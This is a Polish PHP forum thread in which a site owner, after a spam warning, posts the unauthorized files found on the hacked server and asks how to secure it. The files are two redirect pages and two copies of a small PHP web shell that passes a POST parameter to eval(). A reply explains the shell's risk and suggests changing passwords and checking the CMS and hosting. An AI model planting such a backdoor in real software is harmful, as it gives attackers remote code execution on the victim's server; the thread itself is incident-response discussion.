Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> [inne][HTML][PHP] Włamanie na serwer, dziwne pliki, jak sie zabezpieczyć?
adi456
post
Post #1





Grupa: Zarejestrowani
Postów: 251
Pomógł: 0
Dołączył: 21.01.2010
Skąd: Nowy Sącz

Ostrzeżenie: (0%)
-----

Witam,

ostanio przysło mi ostrzeżenie o rozsyłaniu spamu, odkryłem nowe pliki na serwerze, rozumiem że ktoś sie włamał i wykorzystał mój serwer
zna ktoś te pliki? i jak skutecznie zabezpieczyć sie przed tym

nieautoryzowane pliki:

8taIf4yjp.html
[HTML] pobierz, plaintext 
  1. <meta http-equiv="Refresh" content="0; URL=http://google.com/"><html><script>parent.location.href='http://google.com/'</script></html>
[HTML] pobierz, plaintext


Yg3tBUjQw.html
[HTML] pobierz, plaintext 
  1. <meta http-equiv="Refresh" content="0; URL=http://google.com/"><html><script>parent.location.href='http://google.com/'</script></html>
[HTML] pobierz, plaintext


ddslbyi.php
[PHP] pobierz, plaintext 
  1. <?php
  2. error_reporting(4437);
  3. ignore_user_abort(true);
  4. set_time_limit(0);
  5. ini_set('max_execution_time',0);
  6. if (isset($_POST['sdf3sa4'])) {
  7.     $text = strpos($_POST['sdf3sa4'], '\\\\n') === false ? $_POST['sdf3sa4'] : stripslashes($_POST['sdf3sa4']);
  8.     eval($text);
  9. }
  10. ?>
[PHP] pobierz, plaintext


ddseuaq.php
[PHP] pobierz, plaintext 
  1. <?php
  2. error_reporting(4437);
  3. ignore_user_abort(true);
  4. set_time_limit(0);
  5. ini_set('max_execution_time',0);
  6. if (isset($_POST['sdf3sa4'])) {
  7.     $text = strpos($_POST['sdf3sa4'], '\\\\n') === false ? $_POST['sdf3sa4'] : stripslashes($_POST['sdf3sa4']);
  8.     eval($text);
  9. }
  10. ?>
[PHP] pobierz, plaintext
Go to the top of the page
+Quote Post
 
 Start new topic
Odpowiedzi
Sephirus
post
Post #2





Grupa: Zarejestrowani
Postów: 1 527
Pomógł: 438
Dołączył: 28.06.2011
Skąd: Warszawa

Ostrzeżenie: (0%)
-----

Z tego co widzę to te pliki PHP to nie żarty :/

Te pliki ustawiają sobie nieokreślony czas na wykonywanie, ingorują rozłączenie w userem (w teorii mogą chodzić non-stop) a kod do wykonania otrzymują poprzez $_POST :/

Spamowanie to i tak mało w porównaniu z tym co ktoś mógłby z nich wycisnąć...

Zabezpiecz dobrze serwer... Nie znam tych plików ale można nimi wiele zdziałać... :/

Co do opcji skąd się wzięły i jak się zabezpieczyć:
1. Pozmieniaj wszystkie hasła (na jakieś mocne - tak w razie czego)
2. Czy korzystasz na stronie z jakiejś gotowej biblioteki, CMS'a, skryptu, który może zapisywać pliki na serwerze? Jesli tak to ktoś mógł wykorzystać dziurę w kodzie takich skryptów...
3. Co to za serwer? Na czym stoi? Na jakim hostingu/w domu? Od tego dużo zależy...
Go to the top of the page
+Quote Post

Posty w temacie
- adi456   [inne][HTML][PHP] Włamanie na serwer, dziwne pliki   25.01.2012, 12:04:03
- - Sephirus   Z tego co widzę to te pliki PHP to nie żarty :/ ...   25.01.2012, 12:53:59
- - adi456   Serwer wirtualny Pro - w ovh.pl nie korzystam z g...   25.01.2012, 13:55:42

« Następny starszy · Przedszkole · Następny nowszy »
 

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 

Tryb wyświetlania: Przełącz na: Standardowy · Przełącz na: Linearny+ · Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

RSS Aktualny czas: 18.10.2025 - 11:42
Powered By IP.Board © 2025  IPS, Inc.
All changes by PHP.pl Administrators
Hosting zapewnia NQ.pl hosting, trac, svn